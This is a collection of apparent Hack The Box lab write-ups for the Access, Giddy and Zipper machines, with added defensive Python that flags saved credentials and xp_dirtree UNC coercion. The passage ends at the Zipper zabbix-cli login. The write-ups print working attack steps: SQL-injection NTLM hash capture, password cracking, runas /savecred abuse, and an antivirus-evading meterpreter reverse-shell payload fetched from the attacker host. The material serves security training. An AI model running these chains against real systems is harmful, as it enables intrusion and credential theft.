Hackthebox Access Writeup


Explanation:

Hackthebox is a website that hosts a number of vulnerable machines inside its own VPN. This is a write-up of the machine “Access”.

Solution:

1. Initial Enumeration

Port scanning:

root@kali:~# nmap -p- 10.10.10.98 -sV -sC
Starting Nmap 7.70 ( https://nmap.org ) at 2018-09-30 09:27 EEST
Nmap scan report for 10.10.10.98
Host is up (0.035s latency).
Not shown: 65532 filtered ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: TIMEOUT
| ftp-syst: 
|_  SYST: Windows_NT
23/tcp open  telnet?
80/tcp open  http    Microsoft IIS httpd 7.5
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: MegaCorp
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 294.22 seconds

2. Getting User

FTP enumeration:

root@kali:~# ftp 10.10.10.98
Connected to 10.10.10.98.
220 Microsoft FTP Service
Name (10.10.10.98:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
200 PORT command successful.
125 Data connection already open; Transfer starting.
08-23-18  09:16PM       <DIR>          Backups
08-24-18  10:00PM       <DIR>          Engineer
226 Transfer complete.
ftp>

The Engineer directory has a password-protected zip file, “Access Control.zip”.

ftp> cd engineer
250 CWD command successful.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
08-24-18  01:16AM                10870 Access Control.zip
226 Transfer complete.
ftp>

The Backups directory, on the other hand, has an mdb file, “backup.mdb”.

ftp> cd backups
250 CWD command successful.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
08-23-18  09:16PM              5652480 backup.mdb
226 Transfer complete.

“.mdb” is the file extension of the older Microsoft Access database format (used up to Access 2003).
There are online viewers that display the contents of such a file and let us export its tables as CSV.
The table auth_user contains interesting information.

root@kali:~# cat auth_user.csv 
id,username,password,Status,last_login,RoleID,Remark
25,"admin","admin",1,"08/23/18 21:11:47",26,
27,"engineer","access4u@security",1,"08/23/18 21:13:36",26,
28,"backup_admin","admin",1,"08/23/18 21:14:02",26,

The password “access4u@security” opens “Access Control.zip”.
After extracting “Access Control.zip”, what we find is “Access Control.pst”.

root@kali:~/Downloads# ls -la
total 288
drwxr-xr-x 2 root root   4096 Feb 14 22:19  .
drwxr-xr-x 5 root root   4096 Feb 14 22:15  ..
-rw-r--r-- 1 root root 271360 Aug 24 03:13 'Access Control.pst'
-rw-r--r-- 1 root root  10870 Feb 14 22:16 'Access Control.zip'

“.pst” is the extension of the MS Outlook Personal Folders data format.
We can extract its contents as “Access Control.mbox” with the “readpst” command.

root@kali:~/Downloads# readpst 'Access Control.pst' 
Opening PST file and indexes...
Processing Folder "Deleted Items"
"Access Control" - 2 items done, 0 items skipped.
root@kali:~/Downloads# ls -la
total 292
drwxr-xr-x 2 root root   4096 Feb 14 22:23  .
drwxr-xr-x 5 root root   4096 Feb 14 22:15  ..
-rw-r--r-- 1 root root   3105 Feb 14 22:23 'Access Control.mbox'
-rw-r--r-- 1 root root 271360 Aug 24 03:13 'Access Control.pst'
-rw-r--r-- 1 root root  10870 Feb 14 22:16 'Access Control.zip'

The extracted mailbox contains the new password for the user “security”.

root@kali:~# cat 'Access Control.mbox' 
From "john@megacorp.com" Fri Aug 24 02:44:07 2018
Status: RO
From: john@megacorp.com <john@megacorp.com>
Subject: MegaCorp Access Control System "security" account
To: 'security@accesscontrolsystems.com'
Date: Thu, 23 Aug 2018 23:44:07 +0000
MIME-Version: 1.0
Content-Type: multipart/mixed;
boundary="--boundary-LibPST-iamunique-213062548_-_-"


----boundary-LibPST-iamunique-213062548_-_-
Content-Type: multipart/alternative;
boundary="alt---boundary-LibPST-iamunique-213062548_-_-"

--alt---boundary-LibPST-iamunique-213062548_-_-
Content-Type: text/plain; charset="utf-8"

Hi there,

 

The password for the “security” account has been changed to 4Cc3ssC0ntr0ller.  Please ensure this is passed on to your engineers.

 

Regards,

John
~~~~

It looks like we have found an initial credential for the user “security”.
Trying this password over telnet gives us a remote shell.

root@kali:~# telnet 10.10.10.98
Trying 10.10.10.98...
Connected to 10.10.10.98.
Escape character is '^]'.
help
Welcome to Microsoft Telnet Service 

login: security
password: # 4Cc3ssC0ntr0ller

*===============================================================
Microsoft Telnet Server.
*===============================================================
C:\Users\security>

user.txt is in the Desktop folder of the user “security”.

C:\Users\security\Desktop>dir
 Volume in drive C has no label.
 Volume Serial Number is 9C45-DBF0

 Directory of C:\Users\security\Desktop

10/11/2018  05:09 PM    <DIR>          .
10/11/2018  05:09 PM    <DIR>          ..
10/11/2018  04:55 PM                 0 1.txt
10/11/2018  05:03 PM                 0 112.txt
10/11/2018  04:58 PM                 0 2.txt
10/11/2018  04:56 PM                 0 finaly.txt
10/11/2018  04:40 PM                 0 h.txt
10/11/2018  04:54 PM                 0 hhha.txt
10/11/2018  04:46 PM                 0 l.txt
10/11/2018  04:48 PM                 0 llll.txt
10/11/2018  04:55 PM                 0 nnn.txt
10/11/2018  04:45 PM                 0 o.txt
10/11/2018  04:52 PM               262 ooo.txt
10/11/2018  05:09 PM                32 outputme.txt
10/11/2018  04:53 PM                 0 qqq.txt
10/11/2018  04:39 PM                 0 test.txt
10/11/2018  04:38 PM                 0 tewst
08/21/2018  11:37 PM                32 user.txt
              16 File(s)            326 bytes
               2 Dir(s)  16,681,881,600 bytes free

C:\Users\security\Desktop>type user.txt
ff1f3b48913b213a31ff6756d2553d38

3. Getting Root

With the cmdkey command, we can confirm that Windows Credential Manager is storing a credential for the user Administrator.

C:\Users\security>cmdkey /list

Currently stored credentials:

    Target: Domain:interactive=ACCESS\Administrator
                                                       Type: Domain Password
    User: ACCESS\Administrator

We can take advantage of this weakness with the “runas” command and its “/savecred” parameter.
For the .exe file, we have to specify its full path.
It is highly recommended to spin up a Windows 10 VM and test the command there first, because runas produces no error output at all over the telnet session on “Access”.

C:\Users\security>runas /user:Administrator /savecred "C:\windows\system32\makecab.exe C:\Users\Administrator\desktop\root.txt c:\users\security\root.cab"

C:\Users\security>dir
 Volume in drive C has no label.
 Volume Serial Number is 9C45-DBF0

 Directory of C:\Users\security

02/14/2019  08:20 PM    <DIR>          .
02/14/2019  08:20 PM    <DIR>          ..
08/24/2018  07:37 PM    <DIR>          .yawcam
02/11/2019  08:04 PM           325,432 accesschk.exe
08/21/2018  10:35 PM    <DIR>          Contacts
08/28/2018  06:51 AM    <DIR>          Desktop
08/21/2018  10:35 PM    <DIR>          Documents
08/21/2018  10:35 PM    <DIR>          Downloads
08/21/2018  10:35 PM    <DIR>          Favorites
08/21/2018  10:35 PM    <DIR>          Links
08/21/2018  10:35 PM    <DIR>          Music
08/21/2018  10:35 PM    <DIR>          Pictures
02/11/2019  08:03 PM            31,761 privesc.bat
02/14/2019  08:20 PM               113 root.cab
08/21/2018  10:35 PM    <DIR>          Saved Games
08/21/2018  10:35 PM    <DIR>          Searches
02/13/2019  08:37 PM            73,802 shell.exe
08/24/2018  07:39 PM    <DIR>          Videos
               4 File(s)        431,108 bytes
              14 Dir(s)  16,761,311,232 bytes free

We can use the “expand” command to extract the .cab file.
Extracting root.cab gives us root.txt.

C:\Users\security>expand root.cab root.txt
Microsoft (R) File Expansion Utility  Version 6.1.7600.16385
Copyright (c) Microsoft Corporation. All rights reserved.

Adding C:\Users\security\root.txt to Extraction Queue

Expanding Files ....

Expanding Files Complete ...

C:\Users\security>dir
 Volume in drive C has no label.
 Volume Serial Number is 9C45-DBF0

 Directory of C:\Users\security

02/14/2019  08:20 PM    <DIR>          .
02/14/2019  08:20 PM    <DIR>          ..
08/24/2018  07:37 PM    <DIR>          .yawcam
02/11/2019  08:04 PM           325,432 accesschk.exe
08/21/2018  10:35 PM    <DIR>          Contacts
08/28/2018  06:51 AM    <DIR>          Desktop
08/21/2018  10:35 PM    <DIR>          Documents
08/21/2018  10:35 PM    <DIR>          Downloads
08/21/2018  10:35 PM    <DIR>          Favorites
08/21/2018  10:35 PM    <DIR>          Links
08/21/2018  10:35 PM    <DIR>          Music
08/21/2018  10:35 PM    <DIR>          Pictures
02/11/2019  08:03 PM            31,761 privesc.bat
02/14/2019  08:20 PM               113 root.cab
08/21/2018  10:07 PM                32 root.txt
08/21/2018  10:35 PM    <DIR>          Saved Games
08/21/2018  10:35 PM    <DIR>          Searches
02/13/2019  08:37 PM            73,802 shell.exe
08/24/2018  07:39 PM    <DIR>          Videos
               5 File(s)        431,140 bytes
              14 Dir(s)  16,761,311,232 bytes free

C:\Users\security>type root.txt
6e1586cc7ab230a8d297e8f933d904cf
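The root cause on this box is a saved credential for a privileged account on a host other users can log in to. The following added Python (not part of the write-up) parses `cmdkey /list` output in the format shown above and flags entries that a low-privileged local user could reuse; the sample output and the privileged-account list are constructed for the example.

```python
import re
from typing import Dict, List

# Constructed sample of `cmdkey /list` output, modelled on the listing above.
# Note that cmdkey prints the "Type:" line separately and oddly indented.
SAMPLE_CMDKEY_OUTPUT = """
Currently stored credentials:

    Target: Domain:interactive=ACCESS\\Administrator
                                                       Type: Domain Password
    User: ACCESS\\Administrator

    Target: LegacyGeneric:target=git:https://github.com
    Type: Generic
    User: security
    Local machine persistence

    Target: Domain:target=fileserver.megacorp.local
    Type: Domain Password
    User: MEGACORP\\svc_backup
"""

# Accounts whose saved credentials on a shared host deserve a ticket (assumption: site-specific).
PRIVILEGED_USERS = {"administrator"}


def parse_cmdkey_output(text: str) -> List[Dict[str, str]]:
    """Split cmdkey /list output into one dict per stored credential.

    A new entry starts at every 'Target:' line; the 'Type:' and 'User:' lines
    that follow belong to the most recent entry, whatever their indentation.
    """
    entries: List[Dict[str, str]] = []
    for raw in text.splitlines():
        m = re.match(r"(Target|Type|User):\s*(.*)", raw.strip())
        if not m:
            continue
        key, value = m.group(1).lower(), m.group(2).strip()
        if key == "target":
            entries.append({"target": value})
        elif entries:
            entries[-1][key] = value
    return entries


def risky_saved_credentials(text: str) -> List[Dict[str, str]]:
    """Return saved credentials that a low-privileged local user could reuse.

    Two signals: the target is 'Domain:interactive=...' (the form that
    `runas /savecred` stores and later consumes without prompting), or the
    saved user is a privileged principal.
    """
    risky = []
    for entry in parse_cmdkey_output(text):
        account = entry.get("user", "").split("\\")[-1].lower()
        interactive = entry["target"].lower().startswith("domain:interactive=")
        if interactive or account in PRIVILEGED_USERS:
            entry["reason"] = "interactive logon credential" if interactive else "privileged account"
            risky.append(entry)
    return risky
```

Run the check as part of a host audit; on Access it would have reported the ACCESS\Administrator entry before anyone needed runas.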

Hackthebox Giddy Writeup


Explanation

Hackthebox is a website that hosts a number of vulnerable machines inside its own VPN. This is a write-up of the machine “Giddy” on that website.

Solution

1. Initial Enumeration

Port Scanning:

root@kali:~# nmap -p- -sV -sC 10.10.10.104
Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-16 11:11 EET
Nmap scan report for 10.10.10.104
Host is up (0.037s latency).
Not shown: 65531 filtered ports
PORT     STATE SERVICE       VERSION
80/tcp   open  http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
443/tcp  open  ssl/http      Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
| ssl-cert: Subject: commonName=PowerShellWebAccessTestWebSite
| Not valid before: 2018-06-16T21:28:55
|_Not valid after:  2018-09-14T21:28:55
|_ssl-date: 2019-02-16T09:03:25+00:00; -9m44s from scanner time.
| tls-alpn: 
|   h2
|_  http/1.1
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=Giddy
| Not valid before: 2019-02-14T21:04:56
|_Not valid after:  2019-08-16T21:04:56
|_ssl-date: 2019-02-16T09:03:26+00:00; -9m44s from scanner time.
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -9m44s, deviation: 0s, median: -9m44s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 125.45 seconds

Gobuster HTTP:

root@kali:~# gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -s '200,204,301,302,403' -u http://10.10.10.104/

=====================================================
Gobuster v2.0.0              OJ Reeves (@TheColonial)
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://10.10.10.104/
[+] Threads      : 10
[+] Wordlist     : /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes : 200,204,301,302,403
[+] Timeout      : 10s
=====================================================
2019/02/17 13:46:26 Starting gobuster
=====================================================
/remote (Status: 302)
/mvc (Status: 301)
/Remote (Status: 302)
=====================================================
2019/02/17 14:00:26 Finished
=====================================================

Gobuster HTTPS:

root@kali:~# gobuster -k -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -s '200,204,301,302,403' -u https://10.10.10.104/

=====================================================
Gobuster v2.0.0              OJ Reeves (@TheColonial)
=====================================================
[+] Mode         : dir
[+] Url/Domain   : https://10.10.10.104/
[+] Threads      : 10
[+] Wordlist     : /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes : 200,204,301,302,403
[+] Timeout      : 10s
=====================================================
2019/02/17 14:03:14 Starting gobuster
=====================================================
/remote (Status: 302)
/mvc (Status: 301)
/Remote (Status: 302)
=====================================================
2019/02/17 14:17:30 Finished
=====================================================

It looks like the same website is served on port 80 and on port 443.

2. Getting User

We found two interesting pages.

/remote -> redirects to Windows Powershell Web Access
/mvc    -> product list page

Clicking a product in this list redirects to a URL like this one:

http://10.10.10.104/mvc/Product.aspx?ProductSubCategoryId=18

And if we append a single quote to the end of this URL, we get a database error.

This means that Product.aspx has a SQL injection vulnerability.
In this case, we can use an undocumented MSSQL stored procedure to make the database server authenticate to our SMB server and capture its credentials.
First, we have to run our own SMB server to receive the connection. We can do this with a Metasploit module.

msf5 > use auxiliary/server/capture/smb
msf5 auxiliary(server/capture/smb) > set johnpwfile /root/pw.txt
johnpwfile => /root/pw.txt
msf5 auxiliary(server/capture/smb) > set srvhost 10.10.14.23
srvhost => 10.10.14.23
msf5 auxiliary(server/capture/smb) > run
[*] Auxiliary module running as background job 0.

[*] Started service listener on 10.10.14.23:445 
[*] Server started.

Then, open a SQL shell with sqlmap and execute the “xp_dirtree” stored procedure.

root@kali:~# sqlmap -u http://10.10.10.104/mvc/Product.aspx?ProductSubCategoryId=18 --sql-shell

~~~

sql-shell> EXEC master..xp_dirtree '\\10.10.14.23\baa,foo'
[19:14:59] [WARNING] reflective value(s) found and filtering out
EXEC master..xp_dirtree '\\10.10.14.23\baa,foo':    'NULL'
sql-shell>

We then receive several SMB connections from Giddy.

msf5 auxiliary(server/capture/smb) > [*] SMB Captured - 2019-02-26 20:51:20 +0200
NTLMv2 Response Captured from 10.10.10.104:49723 - 10.10.10.104
USER:Stacy DOMAIN:GIDDY OS: LM:
LMHASH:Disabled 
LM_CLIENT_CHALLENGE:Disabled
NTHASH:79b0c0199a0ea376964a588b6e689534 
NT_CLIENT_CHALLENGE:0101000000000000d45342d902ced40113e8c7ee19074eb600000000020000000000000000000000
[*] SMB Captured - 2019-02-26 20:51:20 +0200
NTLMv2 Response Captured from 10.10.10.104:49723 - 10.10.10.104
USER:Stacy DOMAIN:GIDDY OS: LM:
LMHASH:Disabled 
LM_CLIENT_CHALLENGE:Disabled
NTHASH:eb7cabc3257b6e1fb783257dc135c6e9 
NT_CLIENT_CHALLENGE:010100000000000037b84ad902ced4011bbb4ce038500d1800000000020000000000000000000000
[*] SMB Captured - 2019-02-26 20:51:20 +0200
NTLMv2 Response Captured from 10.10.10.104:49723 - 10.10.10.104
USER:Stacy DOMAIN:GIDDY OS: LM:
LMHASH:Disabled 
LM_CLIENT_CHALLENGE:

~~~
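From the defender's side, the xp_dirtree call above leaves a clear trace in SQL Server query auditing: a file-touching extended stored procedure pointed at a UNC path on a host the database server has no business authenticating to. This added Python (not from the write-up) flags such statements in captured query text; the sample statements and the trusted-host list are constructed for the example.

```python
import re
from typing import Dict, List, Optional

# Extended stored procedures that take a path argument and will open a UNC path,
# which makes SQL Server authenticate to whatever host is named in it. Not
# exhaustive: BULK INSERT and OPENROWSET can reach UNC paths too.
FILE_XPS = ("xp_dirtree", "xp_fileexist", "xp_subdirs", "xp_getfiledetails")

# <proc> ... '<\\host\share...>' (single- or double-quoted), case-insensitive.
XP_UNC_RE = re.compile(
    r"(?P<proc>" + "|".join(FILE_XPS) + r")\b[^'\"]*['\"](?P<path>\\\\[^'\"\s\\]+\\[^'\"]*)['\"]",
    re.IGNORECASE,
)

# Hosts the database server is allowed to talk to over SMB (assumption: site-specific).
TRUSTED_UNC_HOSTS = {"fileserver.megacorp.local", "10.10.10.5"}


def flag_unc_coercion(statement: str) -> Optional[Dict[str, str]]:
    """Return a finding if `statement` calls a file-touching xp_* with a UNC
    path to an untrusted host, otherwise None."""
    m = XP_UNC_RE.search(statement)
    if not m:
        return None
    host = m.group("path")[2:].split("\\", 1)[0]   # strip leading \\ and keep the host part
    if host.lower() in TRUSTED_UNC_HOSTS:
        return None
    return {"proc": m.group("proc").lower(), "host": host, "statement": statement.strip()}


# Constructed sample of T-SQL statements, as an audit or Extended Events trace would record them.
SAMPLE_STATEMENTS = [
    "SELECT Name FROM Product WHERE ProductSubCategoryId = 18",
    "EXEC master..xp_dirtree '\\\\10.10.14.23\\baa,foo'",
    "EXEC master..xp_fileexist '\\\\fileserver.megacorp.local\\backups\\x.bak'",
    "SELECT 1; exec master.dbo.xp_dirtree \"\\\\attacker.example\\share\",1,1",
    "EXEC master..xp_dirtree 'C:\\inetpub\\wwwroot'",
]


def scan(statements: List[str]) -> List[Dict[str, str]]:
    """Run the check over a batch of statements and keep only the findings."""
    return [finding for finding in map(flag_unc_coercion, statements) if finding]
```

A hit from an application login such as the one behind Product.aspx is doubly suspicious, since a web app has no reason to call xp_dirtree at all.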

At the same time, we get a John-format hash file at the path we specified.

root@kali:~# cat pw.txt_netntlmv2 
Stacy::GIDDY:1122334455667788:61ae7af3ca2b17f741a536b66dbc5f47:01010000000000006b068f63f5cdd401e9d1374089ee722200000000020000000000000000000000
Stacy::GIDDY:1122334455667788:823e63d2c40f8e7371451b6d427df435:0101000000000000ab809663f5cdd401fbb9f8a8f29f23cf00000000020000000000000000000000
Stacy::GIDDY:1122334455667788:a6f46c56847372412f2f2efbdc91b3e4:0101000000000000add89d63f5cdd4014b711016199a5cae00000000020000000000000000000000
Stacy::GIDDY:1122334455667788:970b31084f1159dc5f3f88d8634ff3ce:01010000000000004415a463f5cdd401f908739a8756930d00000000020000000000000000000000
Stacy::GIDDY:1122334455667788:592a79993ce2d680292578c0e91571e3:01010000000000004bf3aa63f5cdd40108bfb0813046619500000000020000000000000000000000
Stacy::GIDDY:1122334455667788:fcb7261b28331781821024526c79f785:0101000000000000a930b363f5cdd4019db3fefd5e58060500000000020000000000000000000000
Stacy::GIDDY:1122334455667788:0ac3c4f1fe26f6599525c45777f42b73:01010000000000002147bb63f5cdd401af7ab7fa325a1f5500000000020000000000000000000000
Stacy::GIDDY:1122334455667788:79b0c0199a0ea376964a588b6e689534:0101000000000000d45342d902ced40113e8c7ee19074eb600000000020000000000000000000000
Stacy::GIDDY:1122334455667788:eb7cabc3257b6e1fb783257dc135c6e9:010100000000000037b84ad902ced4011bbb4ce038500d1800000000020000000000000000000000
Stacy::GIDDY:1122334455667788:5dabf08a9de326467d01a72d9ba6f5b8:0101000000000000d8ce52d902ced4017897364fc904360d00000000020000000000000000000000
Stacy::GIDDY:1122334455667788:75d8f9037b40c122710c63b8ec08ffa6:0101000000000000f8965ad902ced4014cf4bac6d908990700000000020000000000000000000000
Stacy::GIDDY:1122334455667788:740c59b5f734961f36bba56c5372ffd0:01010000000000006bad62d902ced40133b27c1378cc3db400000000020000000000000000000000
Stacy::GIDDY:1122334455667788:76eec2d84159141f7d182858182551c4:010100000000000015396bd902ced4010b71ac2a4d8cf7c300000000020000000000000000000000
Stacy::GIDDY:1122334455667788:d15bc192d677e500da515fd590225bb1:0101000000000000a1c473d902ced4015cc71ed4942c2b6f00000000020000000000000000000000

This time, we got the username “GIDDY\Stacy” and its NetNTLMv2 response (labelled NTHASH in the capture).
Using John the Ripper, we can recover the password for user Stacy.

root@kali:~# john pw.txt_netntlmv2 --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 14 password hashes with 14 different salts (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
xNnWo6272k7x     (Stacy)
xNnWo6272k7x     (Stacy)
xNnWo6272k7x     (Stacy)
xNnWo6272k7x     (Stacy)
xNnWo6272k7x     (Stacy)
xNnWo6272k7x     (Stacy)
xNnWo6272k7x     (Stacy)
xNnWo6272k7x     (Stacy)
xNnWo6272k7x     (Stacy)
xNnWo6272k7x     (Stacy)
xNnWo6272k7x     (Stacy)
xNnWo6272k7x     (Stacy)
xNnWo6272k7x     (Stacy)
xNnWo6272k7x     (Stacy)
14g 0:00:00:07 DONE (2019-02-26 21:01) 1.806g/s 348820p/s 4883Kc/s 4883KC/s xevood..wtkate
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed

Now we have a username and password to log in to PowerShell Web Access.

Since we have a PowerShell session, we can easily read user.txt.

3. Getting Root

After logging in to the PowerShell console, we find an interesting file related to Ubiquiti UniFi Video.

Using searchsploit, we find a local privilege escalation for it.

root@kali:~# searchsploit unifi video
------------------------------------------------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                                                                     |  Path
                                                                                                                   | (/usr/share/exploitdb/)
------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Ubiquiti Networks UniFi Video Default - 'crossdomain.xml' Security Bypass                                          | exploits/php/webapps/39268.java
Ubiquiti UniFi Video 3.7.3 - Local Privilege Escalation                                                            | exploits/windows/local/43390.txt
------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result

This means that if we have write permission on C:\ProgramData\unifi-video, we can place a file named “taskkill.exe” in that folder.
By default that file does not exist.
However, “UniFi Video” still tries to execute it with elevated privileges when the service restarts.

Payload creation:
This time, to avoid antivirus, we use a Metasploit evasion module.

msf5 evasion(windows/windows_defender_exe) > use evasion/windows/windows_defender_exe 
msf5 evasion(windows/windows_defender_exe) > set payload windows/meterpreter_reverse_https
payload => windows/meterpreter_reverse_https
msf5 evasion(windows/windows_defender_exe) > set lport 443
lport => 443
msf5 evasion(windows/windows_defender_exe) > set lhost tun0
lhost => tun0
msf5 evasion(windows/windows_defender_exe) > set filename taskkill.exe
filename => taskkill.exe
msf5 evasion(windows/windows_defender_exe) > run

[*] Compiled executable size: 184320
[+] taskkill.exe stored at /root/.msf4/local/taskkill.exe

The payload is now in /root/.msf4/local.
Next, run a simple web server so that Giddy can download “taskkill.exe”.

root@kali:~/.msf4/local# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...

After that, launch a reverse shell handler with Metasploit.

msf5 > use multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter_reverse_https
payload => windows/meterpreter_reverse_https
msf5 exploit(multi/handler) > set lhost tun0
lhost => tun0
msf5 exploit(multi/handler) > set lport 443
lport => 443
msf5 exploit(multi/handler) > run

[*] Started HTTPS reverse handler on https://10.10.14.23:443

To download “taskkill.exe” from our host, cd to “C:\ProgramData\unifi-video” on Giddy and fetch it with Invoke-WebRequest.

PS C:\Users\Stacy\Documents> 
cd C:\ProgramData
PS C:\ProgramData> 
cd unifi-video
PS C:\ProgramData\unifi-video> 
Invoke-WebRequest -o taskkill.exe http://10.10.14.23/taskkill.exe
PS C:\ProgramData\unifi-video> 
dir
 
    Directory: C:\ProgramData\unifi-video
 
Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
d-----        6/16/2018   9:54 PM                bin                                                                   
d-----        6/16/2018   9:55 PM                conf                                                                  
d-----        6/16/2018  10:56 PM                data                                                                  
d-----        6/16/2018   9:54 PM                email                                                                 
d-----        6/16/2018   9:54 PM                fw                                                                    
d-----        6/16/2018   9:54 PM                lib                                                                   
d-----        2/25/2019  12:12 AM                logs                                                                  
d-----        6/16/2018   9:55 PM                webapps                                                               
d-----        6/16/2018   9:55 PM                work                                                                  
-a----        7/26/2017   6:10 PM         219136 avService.exe                                                         
-a----        6/17/2018  11:23 AM          31685 hs_err_pid1992.log                                                    
-a----        6/17/2018  11:23 AM      534204321 hs_err_pid1992.mdmp                                                   
-a----        8/16/2018   7:47 PM              0 hs_err_pid2036.mdmp                                                   
-a----        2/27/2019   2:00 AM         254976 taskkill.exe                                                          
-a----        6/16/2018   9:54 PM            780 Ubiquiti UniFi Video.lnk                                              
-a----        7/26/2017   6:10 PM          48640 UniFiVideo.exe                                                        
-a----        7/26/2017   6:10 PM          32038 UniFiVideo.ico                                                        
-a----        6/16/2018   9:54 PM          89050 Uninstall.exe                                                         

Then, restart the service “Ubiquiti UniFi Video”.

PS C:\ProgramData\unifi-video> 
Stop-Service "Ubiquiti UniFi Video"

~~~

PS C:\ProgramData\unifi-video> 
Start-Service "Ubiquiti UniFi Video"

~~~

With this procedure, we get a Meterpreter shell running as NT AUTHORITY\SYSTEM.

[*] Started HTTPS reverse handler on https://10.10.14.23:443
[*] https://10.10.14.23:443 handling request from 10.10.10.104; (UUID: fhbxmi4j) Redirecting stageless connection from /zhbkjtSs9OjYs9myhMWwjg8W-NNUTkclqLtPZjGEDiL1a5TuI with UA 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko'
[*] https://10.10.14.23:443 handling request from 10.10.10.104; (UUID: fhbxmi4j) Attaching orphaned/stageless session...
[*] Meterpreter session 1 opened (10.10.14.23:443 -> 10.10.10.104:49708) at 2019-02-27 12:36:46 +0200

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

As usual, root.txt is in the directory “C:\Users\Administrator\Desktop”.

meterpreter > dir
Listing: C:\Users\Administrator\Desktop
=======================================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100666/rw-rw-rw-  842   fil   2018-06-17 04:54:54 +0300  Ubiquiti UniFi Video.lnk
100666/rw-rw-rw-  282   fil   2018-06-17 03:56:45 +0300  desktop.ini
100666/rw-rw-rw-  32    fil   2018-06-17 17:53:24 +0300  root.txt

meterpreter > cat root.txt
CF559C6C121F683BF3E56891E80641B1

Hackthebox Zipper Writeup


Explanation

Hackthebox is a website that hosts a number of vulnerable machines inside its own VPN. This is a write-up of the machine “Zipper” on that website.

Solution

1. Initial Enumeration

Port Scanning:

root@kali:~# nmap -p- 10.10.10.108 -sC -sV
Starting Nmap 7.70 ( https://nmap.org ) at 2018-10-21 21:04 EEST
Nmap scan report for 10.10.10.108
Host is up (0.038s latency).
Not shown: 65532 closed ports
PORT      STATE SERVICE    VERSION
22/tcp    open  ssh        OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 59:20:a3:a0:98:f2:a7:14:1e:08:e0:9b:81:72:99:0e (RSA)
|   256 aa:fe:25:f8:21:24:7c:fc:b5:4b:5f:05:24:69:4c:76 (ECDSA)
|_  256 89:28:37:e2:b6:cc:d5:80:38:1f:b2:6a:3a:c3:a1:84 (ED25519)
80/tcp    open  http       Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
10050/tcp open  tcpwrapped
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 96.54 seconds

Gobuster HTTP:

root@kali:~# gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -s '200,204,301,302,403' -u http://10.10.10.108

=====================================================
Gobuster v2.0.0              OJ Reeves (@TheColonial)
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://10.10.10.108/
[+] Threads      : 10
[+] Wordlist     : /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes : 200,204,301,302,403
[+] Timeout      : 10s
=====================================================
2018/10/25 11:21:11 Starting gobuster
=====================================================
/zabbix (Status: 301)
/server-status (Status: 403)
=====================================================
2018/10/25 11:34:40 Finished
=====================================================

2. Getting User

It looks like Zabbix is running on the server.

We can log in as the guest user.
Through enumeration, we find that there is a user “zapper”.

zapper uses the easily guessable password “zapper”.
With it, we can log in to Zabbix as a regular user.
However, we still cannot use the Zabbix GUI, because zapper's user group is configured with no frontend access.

So we have to use “zabbix-cli” instead.
First, install and set up zabbix-cli with the following commands.

root@kali:~# git clone https://github.com/usit-gd/zabbix-cli.git

~~~

root@kali:~/zabbix-cli# ./setup.py install

~~~

root@kali:~/zabbix-cli# zabbix-cli-init -z http://10.10.10.108/zabbix
[INFO]: wrote config to '/root/.zabbix-cli/zabbix-cli.conf'

Next, connect with the “zabbix-cli” command.
As you can see, with the credential “zapper:zapper” we can log in to the Zabbix CLI console.

root@kali:~/zabbix-cli# zabbix-cli
-------------------------
Zabbix-CLI authentication
-------------------------
# Username[root]: zapper
# Password: 


#############################################################
Welcome to the Zabbix command-line interface (v.2.0.1)
#############################################################
